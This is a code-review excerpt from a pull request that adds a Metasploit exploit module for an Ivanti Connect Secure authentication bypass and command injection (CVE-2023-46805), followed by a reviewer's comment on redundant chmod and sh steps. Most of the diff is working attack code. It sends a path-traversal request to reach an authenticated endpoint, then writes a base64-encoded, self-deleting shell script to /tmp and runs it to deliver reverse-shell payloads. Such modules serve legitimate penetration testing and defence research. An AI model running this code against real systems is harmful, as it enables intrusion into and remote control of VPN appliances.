modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb

```diff
@@ -0,0 +1,144 @@
+            # cmd/unix/python/meterpreter/reverse_tcp
+            # cmd/unix/reverse_bash
+            # cmd/unix/reverse_python
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD]
+            },
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve
+    # the target system version information. If this requests succeeds, the target is vulnerable.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    # If the vendor mitigation has been applied, the request will return 403 Forbidden.
+    return CheckCode::Safe if res.code != 200
+
+    # By here we know the target is vulnerable, we can pull out the exact version information from the response, this
+    # is only for display purposes, we dont need to test the version information.
+
+    begin
+      json_data = JSON.parse(res.body)
+
+      name = json_data.dig('software-inventory', 'software', 'name')
+      version = json_data.dig('software-inventory', 'software', 'version')
+      build = json_data.dig('software-inventory', 'software', 'build')
+
+      return Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})") unless name.nil? || version.nil? || build.nil?
+    rescue JSON::ParserError
+      return CheckCode::Unknown('Failed to parse JSON data')
+    end
+
+    # Fall through to here if we got a JSON response but it didnt contain the keys we expected.
+    CheckCode::Unknown('No version information in response')
+  end
+
+  def exploit
+    # NOTE: The Linux payloads only work when we bootstrap them using the below technique.
+
+    # A shell script to execute the Metasploit payload. Will delete itself upon execution.
+    bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}"
+
+    # The location of our bootstrap script. (I dont think we can use File.join in case MSF is run on Windows)
+    bootstrap_file = datastore['FETCH_WRITABLE_DIR']
+    bootstrap_file += '/' unless datastore['FETCH_WRITABLE_DIR'].end_with? '/'
+    bootstrap_file += Rex::Text.rand_text_alpha(8)
+
+    # Write the payload to a tmp file and then execute it.
+    commands = [
+      "openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}",
+      "chmod +x #{bootstrap_file}",
+      "sh #{bootstrap_file}"
```

Comment:
No need to `+x` and `sh`, one of them is enough :)

```suggestion
      "sh #{bootstrap_file}"
```

```suggestion
      "chmod +x #{bootstrap_file}",
      "#{bootstrap_file}"
```

Reply:
No longer needed thanks to commit [4ff3998](https://github.com/rapid7/metasploit-framework/pull/18708/commits/4ff399844f51c8d5177c52af1fe0cc9c0a1604c2), marking this comment as resolved.